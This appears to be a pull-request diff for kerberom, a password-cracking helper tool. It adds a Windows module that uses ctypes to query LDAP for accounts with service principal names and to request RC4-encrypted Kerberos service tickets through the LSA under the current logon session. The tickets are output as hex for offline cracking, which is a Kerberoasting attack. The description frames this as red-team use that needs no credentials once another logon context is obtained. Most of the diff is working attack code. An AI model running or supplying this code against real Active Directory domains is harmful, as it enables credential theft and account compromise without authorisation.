+exe = EXE(pyz,
+          a.scripts,
+          a.binaries,
+          a.zipfiles,
+          a.datas,
+          name='kerberom', # or random_name(6)
+          debug=False,
+          icon=None,
+          strip=False,
+          upx=False,
+          console=True )

--- a/run/kerberom/modules/rom/_crypto/ARC4.py
+++ b/run/kerberom/modules/rom/_crypto/ARC4.py
@@ -1,6 +1,6 @@
 # ----------------------------------------------------------------------------
 # "THE BEER-WARE LICENSE" (Revision 42):
-# <eddy (dot) maaalou (at) gmail (dot) com> wrote this file.  As long as you 
+# <jean-christophe.delaunay (at) synacktiv.com> wrote this file.  As long as you 
 # retain this notice you can do whatever you want with this stuff. If we meet 
 # some day, and you think this stuff is worth it, you can buy me a beer in 
 # return.   Fist0urs

--- a/run/kerberom/modules/rom/_crypto/MD4.py
+++ b/run/kerberom/modules/rom/_crypto/MD4.py
@@ -1,6 +1,6 @@
 # ----------------------------------------------------------------------------
 # "THE BEER-WARE LICENSE" (Revision 42):
-# <eddy (dot) maaalou (at) gmail (dot) com> wrote this file.  As long as you 
+# <jean-christophe.delaunay (at) synacktiv.com> wrote this file.  As long as you 
 # retain this notice you can do whatever you want with this stuff. If we meet 
 # some day, and you think this stuff is worth it, you can buy me a beer in 
 # return.   Fist0urs

--- a/run/kerberom/modules/rom/_crypto/MD5.py
+++ b/run/kerberom/modules/rom/_crypto/MD5.py
@@ -1,6 +1,6 @@
 # ----------------------------------------------------------------------------
 # "THE BEER-WARE LICENSE" (Revision 42):
-# <eddy (dot) maaalou (at) gmail (dot) com> wrote this file.  As long as you 
+# <jean-christophe.delaunay (at) synacktiv.com> wrote this file.  As long as you 
 # retain this notice you can do whatever you want with this stuff. If we meet 
 # some day, and you think this stuff is worth it, you can buy me a beer in 
 # return.   Fist0urs

--- a/run/kerberom/modules/rom/ccache.py
+++ b/run/kerberom/modules/rom/ccache.py
@@ -1,6 +1,6 @@
 # ----------------------------------------------------------------------------
 # "THE BEER-WARE LICENSE" (Revision 42):
-# <eddy (dot) maaalou (at) gmail (dot) com> wrote this file.  As long as you 
+# <jean-christophe.delaunay (at) synacktiv.com> wrote this file.  As long as you 
 # retain this notice you can do whatever you want with this stuff. If we meet 
 # some day, and you think this stuff is worth it, you can buy me a beer in 
 # return.   Fist0urs

--- a/run/kerberom/modules/rom/crypto.py
+++ b/run/kerberom/modules/rom/crypto.py
@@ -1,6 +1,6 @@
 # ----------------------------------------------------------------------------
 # "THE BEER-WARE LICENSE" (Revision 42):
-# <eddy (dot) maaalou (at) gmail (dot) com> wrote this file.  As long as you 
+# <jean-christophe.delaunay (at) synacktiv.com> wrote this file.  As long as you 
 # retain this notice you can do whatever you want with this stuff. If we meet 
 # some day, and you think this stuff is worth it, you can buy me a beer in 
 # return.   Fist0urs

--- a/run/kerberom/modules/rom/krb5.py
+++ b/run/kerberom/modules/rom/krb5.py
@@ -1,8 +1,8 @@
 # ----------------------------------------------------------------------------
 # "THE BEER-WARE LICENSE" (Revision 42):
-# <eddy (dot) maaalou (at) gmail (dot) com> wrote this file.  As long as you 
-# retain this notice you can do whatever you want with this stuff. If we meet 
-# some day, and you think this stuff is worth it, you can buy me a beer in 
+# <jean-christophe.delaunay (at) synacktiv.com> wrote this file.  As long as you
+# retain this notice you can do whatever you want with this stuff. If we meet
+# some day, and you think this stuff is worth it, you can buy me a beer in
 # return.   Fist0urs
 # ----------------------------------------------------------------------------
 
@@ -92,7 +92,7 @@ class EncryptedData(Sequence):
 class EncryptionKey(Sequence):
     componentType = NamedTypes(
         NamedType('keytype', _c(0, Integer())),
-        NamedType('keyvalue', _c(1, OctetString())))    
+        NamedType('keyvalue', _c(1, OctetString())))
 
 class CheckSum(Sequence):
     componentType = NamedTypes(
@@ -429,6 +429,7 @@ def recv_rep(sock):
 def _decrypt_rep(data, key, spec, enc_spec, msg_type):
     rep = decode(data, asn1Spec=spec)[0]
     rep_enc = str(rep['enc-part']['cipher'])
+    #print rep_enc
     rep_enc = decrypt(key[0], key[1], msg_type, rep_enc)
 
     # MAGIC
@@ -441,6 +442,15 @@ def _decrypt_rep(data, key, spec, enc_spec, msg_type):
 
 def decrypt_tgs_rep(data, key):
     return _decrypt_rep(data, key, TgsRep(), EncTGSRepPart(), 9) # assume subkey
+
+def _extract_data(data, spec):
+    rep = decode(data, asn1Spec=spec)[0]
+
+    return rep
+
+#used in implicit authentication
+def extract_tgs_data(data):
+    return _extract_data(data, Ticket())
 
 def decrypt_as_rep(data, key):
     return _decrypt_rep(data, key, AsRep(), EncASRepPart(), 8)

--- a/run/kerberom/modules/rom/pac.py
+++ b/run/kerberom/modules/rom/pac.py
@@ -1,6 +1,6 @@
 # ----------------------------------------------------------------------------
 # "THE BEER-WARE LICENSE" (Revision 42):
-# <eddy (dot) maaalou (at) gmail (dot) com> wrote this file.  As long as you 
+# <jean-christophe.delaunay (at) synacktiv.com> wrote this file.  As long as you 
 # retain this notice you can do whatever you want with this stuff. If we meet 
 # some day, and you think this stuff is worth it, you can buy me a beer in 
 # return.   Fist0urs

--- a/run/kerberom/modules/rom/rich.py
+++ b/run/kerberom/modules/rom/rich.py
@@ -1,0 +1,467 @@
+# ----------------------------------------------------------------------------
+# "THE BEER-WARE LICENSE" (Revision 42):
+# <jean-christophe.delaunay (at) synacktiv.com> wrote this file.  As long as you 
+# retain this notice you can do whatever you want with this stuff. If we meet 
+# some day, and you think this stuff is worth it, you can buy me a beer in 
+# return.   Fist0urs
+# ----------------------------------------------------------------------------
+
+#!/usr/bin/python
+
+# -*- coding: utf-8 -*-
+
+# by Fist0urs
+
+from os.path import dirname
+
+from ctypes import windll, cdll, memmove, cast, Structure, Union, addressof, byref, create_unicode_buffer, \
+                   c_ubyte as UCHAR, c_wchar as wchar_t, c_wchar_p as PWSTR, POINTER, sizeof, \
+                   c_void_p as PVOID, c_longlong as LONGLONG, c_ulonglong as ULONGLONG, c_char_p as PCHAR
+
+from ctypes.wintypes import BOOL, DWORD, HANDLE, SHORT, USHORT, LONG, ULONG, BYTE
+
+PUCHAR = POINTER(UCHAR)
+
+LDAP_SUCCESS = 0
+LDAP_VERSION3 = 3
+LDAP_NO_LIMIT = 0
+LDAP_PORT = 389
+LDAP_AUTH_NEGOTIATE = (0x86 | 0x0400)
+LDAP_OPT_PROTOCOL_VERSION = (0x11)
+LDAP_OPT_SIZELIMIT = (0x03)
+LDAP_OPT_TIMELIMIT = (0x04)
+LDAP_SCOPE_SUBTREE = (0x02)
+
+ANYSIZE_ARRAY = 1
+
+STATUS_SUCCESS = 0x00000000
+
+LsaConnectUntrusted = windll.secur32.LsaConnectUntrusted
+LsaLookupAuthenticationPackage = windll.secur32.LsaLookupAuthenticationPackage
+LsaCallAuthenticationPackage = windll.secur32.LsaCallAuthenticationPackage
+LsaFreeReturnBuffer = windll.secur32.LsaFreeReturnBuffer
+
+ldap_init = cdll.wldap32.ldap_init
+ldap_set_option = cdll.wldap32.ldap_set_option
+ldap_connect =  cdll.wldap32.ldap_connect
+ldap_unbind = cdll.wldap32.ldap_unbind
+ldap_unbind_s = cdll.wldap32.ldap_unbind
+ldap_bind_s = cdll.wldap32.ldap_bind_s
+ldap_search_s = cdll.wldap32.ldap_search_s
+ldap_msgfree = cdll.wldap32.ldap_msgfree
+ldap_count_entries = cdll.wldap32.ldap_count_entries
+ldap_first_entry = cdll.wldap32.ldap_first_entry
+ldap_next_entry = cdll.wldap32.ldap_next_entry
+LdapGetLastError = cdll.wldap32.LdapGetLastError
+ldap_first_attribute = cdll.wldap32.ldap_first_attribute
+ldap_next_attribute = cdll.wldap32.ldap_next_attribute
+ldap_get_values = cdll.wldap32.ldap_get_values
+ldap_count_values = cdll.wldap32.ldap_count_values
+ldap_value_free = cdll.wldap32.ldap_value_free
+ldap_memfree = cdll.wldap32.ldap_memfree
+ldap_msgfree = cdll.wldap32.ldap_msgfree
+ber_free = cdll.wldap32.ber_free
+
+class _SecHandle(Structure):
+    _fields_ = [
+        ('dwLower', ULONGLONG),
+        ('dwUpper', ULONGLONG),
+    ]
+PSecHandle = POINTER(_SecHandle)
+SecHandle = _SecHandle
+
+class _LSA_UNICODE_STRING(Structure):
+    _fields_ = [
+        ('Length', USHORT),
+        ('MaximumLength', USHORT),
+        ('Buffer', PWSTR),
+    ]
+PLSA_UNICODE_STRING = POINTER(_LSA_UNICODE_STRING)
+LSA_UNICODE_STRING = _LSA_UNICODE_STRING
+UNICODE_STRING = LSA_UNICODE_STRING
+
+class _LUID(Structure):
+    _fields_ = [
+        ('LowPart', DWORD),
+        ('HighPart', LONG),
+    ]
+PLUID = POINTER(_LUID)
+LUID = _LUID
+
+class _KERB_RETRIEVE_TKT_REQUEST(Structure):
+    _fields_ = [
+        ('MessageType', DWORD),
+        ('LogonId', LUID),
+        ('TargetName', UNICODE_STRING),
+        ('TicketFlags', ULONG),
+        ('CacheOptions', ULONG),
+        ('EncryptionType', LONG),
+        ('CredentialsHandle', SecHandle),
+    ]
+PKERB_RETRIEVE_TKT_REQUEST = POINTER(_KERB_RETRIEVE_TKT_REQUEST)
+KERB_RETRIEVE_TKT_REQUEST = _KERB_RETRIEVE_TKT_REQUEST
+
+class _BIG_INTEGER(Structure):
+    _fields_ = [
+        ('LowPart', DWORD),
+        ('HighPart', LONG),
+    ]
+PBIG_INTEGER = POINTER(_BIG_INTEGER)
+BIG_INTEGER = _BIG_INTEGER
+
+class _LARGE_INTEGER(Union):
+    _fields_ = [
+        ('u', BIG_INTEGER),
+        ('QuadPart', LONGLONG),
+    ]
+PLARGE_INTEGER = POINTER(_LARGE_INTEGER)
+LARGE_INTEGER = _LARGE_INTEGER
+
+class _KERB_EXTERNAL_NAME(Structure):
+    _fields_ = [
+        ('NameType', SHORT),
+        ('NameCount', USHORT),
+        ('Names', UNICODE_STRING * ANYSIZE_ARRAY),
+    ]
+PKERB_EXTERNAL_NAME = POINTER(_KERB_EXTERNAL_NAME)
+KERB_EXTERNAL_NAME = _KERB_EXTERNAL_NAME
+
+class KERB_CRYPTO_KEY(Structure):
+    _fields_ = [
+        ('KeyType', LONG),
+        ('Length', ULONG),
+        ('Value', PUCHAR),
+    ]
+PKERB_EXTERNAL_TICKET = POINTER(KERB_CRYPTO_KEY)
+
+class _KERB_EXTERNAL_TICKET(Structure):
+    _fields_ = [
+        ('ServiceName', PKERB_EXTERNAL_NAME),
+        ('TargetName', PKERB_EXTERNAL_NAME),
+        ('ClientName', PKERB_EXTERNAL_NAME),
+        ('DomainName', UNICODE_STRING),
+        ('TargetDomainName', UNICODE_STRING),
+        ('AltTargetDomainName', UNICODE_STRING),
+        ('SessionKey', KERB_CRYPTO_KEY),
+        ('TicketFlags', ULONG),
+        ('Flags', ULONG),
+        ('KeyExpirationTime', LARGE_INTEGER),
+        ('StartTime', LARGE_INTEGER),
+        ('EndTime', LARGE_INTEGER),
+        ('RenewUntil', LARGE_INTEGER),
+        ('TimeSkew', LARGE_INTEGER),
+        ('EncodedTicketSize', ULONG),
+        ('EncodedTicket', PUCHAR),
+    ]
+PKERB_EXTERNAL_TICKET = POINTER(_KERB_EXTERNAL_TICKET)
+KERB_EXTERNAL_TICKET = _KERB_EXTERNAL_TICKET
+
+
+class _KERB_RETRIEVE_TKT_RESPONSE(Structure):
+    _fields_ = [
+        ('Ticket', KERB_EXTERNAL_TICKET),
+    ]
+PKERB_RETRIEVE_TKT_RESPONSE = POINTER(_KERB_RETRIEVE_TKT_RESPONSE)
+KERB_RETRIEVE_TKT_RESPONSE = _KERB_RETRIEVE_TKT_RESPONSE
+
+class _LDSB(Structure):
+    _fields_ = [
+        ('sb_sd', LONGLONG),
+        ('Reserved1', UCHAR * ((10*sizeof(ULONG))+1)),
+        ('sb_naddr', ULONGLONG),
+        ('Reserved2', UCHAR * ((6*sizeof(ULONG))+1)),
+    ]
+PLDSB = POINTER(_LDSB)
+LDSB = _LDSB
+
+class _LDAP(Structure):
+    _fields_ = [
+        ('ld_sb', LDSB),
+        ('ld_host', PCHAR),
+        ('ld_version', ULONG),
+        ('ld_lberoptions', UCHAR),
+        ('ld_deref', ULONG),
+        ('ld_timelimit', ULONG),
+        ('ld_sizelimit', ULONG),
+        ('ld_errno', ULONG),
+        ('ld_matched', PCHAR),
+        ('ld_error', PCHAR),
+        ('ld_msgid', ULONG),
+        ('Reserved3', UCHAR * ((6*sizeof(ULONG))+1)),
+        ('ld_cldaptries', ULONG),
+        ('ld_cldaptimeout', ULONG),
+        ('ld_refhoplimit', ULONG),
+        ('ld_options', ULONG),
+    ]
+PLDAP = POINTER(_LDAP)
+LDAP = _LDAP
+
+class _LDAPMSG(Structure):
+    _fields_ = [
+        ('lm_msgid', ULONG),
+        ('lm_msgtype', ULONG),
+        ('lm_ber', PVOID),
+        ('lm_chain', PVOID),
+        ('lm_next', PVOID),
+        ('lm_time', ULONG),
+        ('Connection', PLDAP),
+        ('Request', PVOID),
+        ('lm_returncode', ULONG),
+        ('lm_referral', USHORT),
+        ('lm_chased', BOOL),
+        ('lm_eom', BOOL),
+        ('ConnectionReferenced', BOOL),
+    ]
+PLDAPMSG = POINTER(_LDAPMSG)
+LDAPMSG = _LDAPMSG
+
+class berelement(Structure):
+    _fields_ = [
+        ('opaque', PCHAR),
+    ]
+PBerElement = POINTER(berelement)
+BerElement = berelement
+
+
+def ConnectToLDAP(pConnectionInformation):
+
+    dwRes = ULONG(LDAP_SUCCESS)
+    version = ULONG(LDAP_VERSION3)
+    size = ULONG(LDAP_NO_LIMIT)
+    time = ULONG(LDAP_NO_LIMIT)
+
+    hLDAPConnection = ldap_init(pConnectionInformation, LDAP_PORT)
+
+    if hLDAPConnection == 0:
+        print "Impossible to connect to LDAP\n"
+        return 0
+
+    dwRes = ldap_set_option(hLDAPConnection, LDAP_OPT_PROTOCOL_VERSION, byref(version))
+
+    if dwRes != LDAP_SUCCESS:
+        print "Unable to set LDAP protocol option (ErrorCode: %d).\r\n" % dwRes
+        if hLDAPConnection != 0:
+            ldap_unbind(hLDAPConnection)
+            return 0
+
+    dwRes = ldap_set_option(hLDAPConnection, LDAP_OPT_SIZELIMIT, byref(size))
+
+    if dwRes != LDAP_SUCCESS:
+        print "Unable to set LDAP size limit option (ErrorCode: %d).\r\n" % dwRes
+        if hLDAPConnection != 0:
+            ldap_unbind(hLDAPConnection)
+            return 0
+
+    dwRes = ldap_set_option(hLDAPConnection, LDAP_OPT_TIMELIMIT, byref(time))
+
+    if dwRes != LDAP_SUCCESS:
+        print "Unable to set LDAP time limit option (ErrorCode: %d).\r\n" % dwRes
+        if hLDAPConnection != 0:
+            ldap_unbind(hLDAPConnection)
+            return 0
+
+    dwRes = ldap_connect(hLDAPConnection, 0);
+
+    if dwRes != LDAP_SUCCESS:
+        print "Unable to connect to LDAP server\n"
+        if hLDAPConnection != 0:
+            ldap_unbind(hLDAPConnection)
+            return 0
+
+    dwRes = ldap_bind_s(hLDAPConnection, 0, 0, LDAP_AUTH_NEGOTIATE);
+
+    if dwRes != LDAP_SUCCESS:
+        print "Unable to bind to LDAP server\n"
+        if hLDAPConnection != 0:
+            ldap_unbind(hLDAPConnection)
+            return 0
+
+    return cast(hLDAPConnection, PLDAP)
+
+
+def LDAPsearch(hLDAPConnection, pMyDN, pMyFilter, pMyAttributes):
+    KerberomResult = []
+    pSearchResult = PLDAPMSG()
+
+    errorCode = ldap_search_s(
+            hLDAPConnection,
+            pMyDN,
+            LDAP_SCOPE_SUBTREE,
+            pMyFilter,
+            pMyAttributes,
+            0,
+            byref(pSearchResult))
+
+    if errorCode != LDAP_SUCCESS:
+        print "ldap_search_s failed with %d \n" % errorCode
+        ldap_unbind_s(hLDAPConnection);
+        if pSearchResult != 0:
+            ldap_msgfree(pSearchResult);
+            return 0;
+
+    numberOfEntries = ldap_count_entries(
+            hLDAPConnection,
+            pSearchResult)
+
+    if numberOfEntries == 0:
+        print "ldap_count_entries failed with %d \n" % errorCode
+
+        ldap_unbind_s(hLDAPConnection);
+        if pSearchResult != 0:
+            ldap_msgfree(pSearchResult);
+            return 0;
+
+    pEntry = PLDAPMSG()
+
+    for iCnt in range(numberOfEntries):
+        entry = {}
+        if iCnt == 0:
+            pEntry = ldap_first_entry(hLDAPConnection, pSearchResult)
+        else:
+            pEntry = ldap_next_entry(hLDAPConnection, pEntry)
+
+        sMsg = "ldap_next_entry"
+        if iCnt == 0:
+            sMsg = "ldap_first_entry"
+
+        if pEntry == 0:
+            ldaperror = LdapGetLastError()
+            print "%s failed with %d" % (sMsg, ldaperror)
+            ldap_unbind_s(hLDAPConnection)
+            ldap_msgfree(pSearchResult)
+            return 0
+
+        pBer = PBerElement()
+
+        pAttribute = ldap_first_attribute(hLDAPConnection, pEntry, byref(pBer))
+
+        ppValue = POINTER(PCHAR)
+
+        while pAttribute != 0:
+            ppValue = ldap_get_values(
+                    hLDAPConnection,
+                    pEntry,
+                    pAttribute);
+
+            if ppValue == 0:
+                print "No attribute value returned"
+            else:
+                iValue = ldap_count_values(ppValue)
+                if iValue == 0:
+                    print "Bad value list"
+                else:
+                    
+                    pAttribute = cast(pAttribute, PCHAR)
+                    ppValue = cast(ppValue, POINTER(PCHAR))
+
+                    entry[pAttribute.value.lower()] = ppValue.contents.value
+
+            if ppValue != 0:
+                ldap_value_free(ppValue)
+            ldap_memfree(pAttribute)
+
+            pAttribute = ldap_next_attribute(hLDAPConnection, pEntry, pBer)
+
+        KerberomResult.append(entry)
+        if pBer != 0:
+            ber_free(pBer, 0)
+    
+    ldap_unbind(hLDAPConnection)
+    ldap_msgfree(pSearchResult)
+
+    return KerberomResult
+
+
+def KerberosInit():
+    hLsaConnection = HANDLE()
+
+    status = DWORD(0)
+    LPTR = (0x0000 | 0x0040)
+    MICROSOFT_KERBEROS_NAME_A = PWSTR()
+
+    MICROSOFT_KERBEROS_NAME_A = windll.kernel32.LocalAlloc(LPTR, len("Kerberos") + 1)
+
+    memmove(MICROSOFT_KERBEROS_NAME_A, "Kerberos", len("Kerberos"))
+
+    status = LsaConnectUntrusted(byref(hLsaConnection))
+
+    if status != STATUS_SUCCESS:
+        print "LsaConnectUntrusted, cannot get LSA handle, error %d " % status
+        windll.kernel32.LocalFree(MICROSOFT_KERBEROS_NAME_A)
+        return None, None
+
+    kerberosPackageName = UNICODE_STRING()
+    kerberosPackageName.Length = USHORT(8)
+    kerberosPackageName.MaximumLength = USHORT(9)
+    kerberosPackageName.Buffer = MICROSOFT_KERBEROS_NAME_A
+
+    dwKerberosAuthenticationPackageId = DWORD(0)
+    status = LsaLookupAuthenticationPackage(hLsaConnection, byref(kerberosPackageName), byref(dwKerberosAuthenticationPackageId))
+
+    windll.kernel32.LocalFree(MICROSOFT_KERBEROS_NAME_A)
+
+    if status == STATUS_SUCCESS:
+        return hLsaConnection, dwKerberosAuthenticationPackageId
+    else:
+        return None, None
+
+
+def Get_TGS(hLsaConnection, dwKerberosAuthenticationPackageId, SPNentry):
+    LPTR = (0x0000 | 0x0040)
+
+    list_of_target = SPNentry["serviceprincipalname"].split(";")
+
+    for target in list_of_target:
+        szSPN = create_unicode_buffer(target.lower())
+        dwSPNSize = USHORT((len(target)) * sizeof(wchar_t))
+
+        dwTicketPayloadSize = DWORD(sizeof(KERB_RETRIEVE_TKT_REQUEST) + dwSPNSize.value)
+
+        KerbRetrieveEncodedTicketMessage = 8
+        KERB_ETYPE_RC4_HMAC_NT = 23
+        KERB_RETRIEVE_TICKET_DONT_USE_CACHE = (0x1)
+
+        dwKerbRetrieveTicketRequestAddress = windll.kernel32.LocalAlloc(LPTR, dwTicketPayloadSize.value)
+        pKerbRetrieveTicketRequest = cast(dwKerbRetrieveTicketRequestAddress, PKERB_RETRIEVE_TKT_REQUEST)
+
+        pKerbRetrieveTicketRequest.contents.MessageType = KerbRetrieveEncodedTicketMessage
+        # current logon session context
+        pKerbRetrieveTicketRequest.contents.LogonID = 0
+        # TargetName
+        pKerbRetrieveTicketRequest.contents.TargetName.Length = USHORT(dwSPNSize.value)
+        pKerbRetrieveTicketRequest.contents.TargetName.MaximumLength = USHORT(dwSPNSize.value + sizeof(wchar_t))
+
+        dwKerbRetrieveTicketRequestBufferAddress = dwKerbRetrieveTicketRequestAddress + sizeof(KERB_RETRIEVE_TKT_REQUEST)
+        memmove(dwKerbRetrieveTicketRequestBufferAddress, szSPN, pKerbRetrieveTicketRequest.contents.TargetName.Length)
+        pKerbRetrieveTicketRequest.contents.TargetName.Buffer = cast(dwKerbRetrieveTicketRequestBufferAddress, PWSTR)
+
+        pKerbRetrieveTicketRequest.contents.TicketFlags = ULONG(0)
+        pKerbRetrieveTicketRequest.contents.CacheOptions = KERB_RETRIEVE_TICKET_DONT_USE_CACHE
+        pKerbRetrieveTicketRequest.contents.EncryptionType = KERB_ETYPE_RC4_HMAC_NT
+        pKerbRetrieveTicketRequest.contents.CredentialsHandle = SecHandle()
+
+        pKerbRetrieveTicketResponse = PVOID()
+        pKerbRetrieveTicketResponse = cast(pKerbRetrieveTicketResponse, PKERB_RETRIEVE_TKT_RESPONSE)
+        dwProtocolStatus = DWORD(0)
+
+        status = LsaCallAuthenticationPackage(hLsaConnection, dwKerberosAuthenticationPackageId, pKerbRetrieveTicketRequest, dwTicketPayloadSize, byref(pKerbRetrieveTicketResponse), byref(dwTicketPayloadSize), byref(dwProtocolStatus))
+
+        windll.kernel32.LocalFree(pKerbRetrieveTicketRequest)
+
+        if status == STATUS_SUCCESS and dwProtocolStatus.value == STATUS_SUCCESS and dwTicketPayloadSize.value != 0:
+            pKerbRetrieveTicketResponse = cast(pKerbRetrieveTicketResponse, PKERB_RETRIEVE_TKT_RESPONSE)
+            pEncodedTicket = pKerbRetrieveTicketResponse.contents.Ticket.EncodedTicket
+            dwEncodedTicketSize = pKerbRetrieveTicketResponse.contents.Ticket.EncodedTicketSize
+    
+            Ticket = ""
+            for i in range(dwEncodedTicketSize):
+                Ticket += hex(pEncodedTicket[i]).replace("0x",'').zfill(2)
+
+            LsaFreeReturnBuffer(pKerbRetrieveTicketResponse)
+
+            return Ticket
+        else:
+            print " [-] Cannot retrieve ticket for account '%s' and SPN '%s', status: %s ; protocolstatus: %s" % (SPNentry["samaccountname"], target, hex(status), hex(dwProtocolStatus.value))
+            print " [+] Trying the next one."
+    print "[-] Could not retrieve any ticket for account '%s' and the list of SPN: '%s'" % (SPNentry["samaccountname"], SPNentry["serviceprincipalname"])
+    return 0

--- a/run/kerberom/modules/rom/util.py
+++ b/run/kerberom/modules/rom/util.py
@@ -1,6 +1,6 @@
 # ----------------------------------------------------------------------------
 # "THE BEER-WARE LICENSE" (Revision 42):
-# <eddy (dot) maaalou (at) gmail (dot) com> wrote this file.  As long as you 
+# <jean-christophe.delaunay (at) synacktiv.com> wrote this file.  As long as you 
 # retain this notice you can do whatever you want with this stuff. If we meet 
 # some day, and you think this stuff is worth it, you can buy me a beer in 
 # return.   Fist0urs


### PR DESCRIPTION
### Summary

This is a new version of the run/kerberom tool. It provides Windows support (needing PyInstaller if you want to create a standalone binary) and especially the support of Windows implicit authentication. This is particularly interesting if one managed to get another current logon context, for example in redteam assessments, thus not needing any credential to use kerberom and retrieve TGS to crack with krb5tgs format.

### Other Information

The Linux part was a bit modified so that it output samaccountname:ticket, but this does not impact john implementation :+1:  .

This should not be the final version, when I find time I'll implement the other krb5tgs format (thus not based on ARC4 but SHA1) and adapt the tool to retrieve the corresponding hashes :wink: 

Cheers!
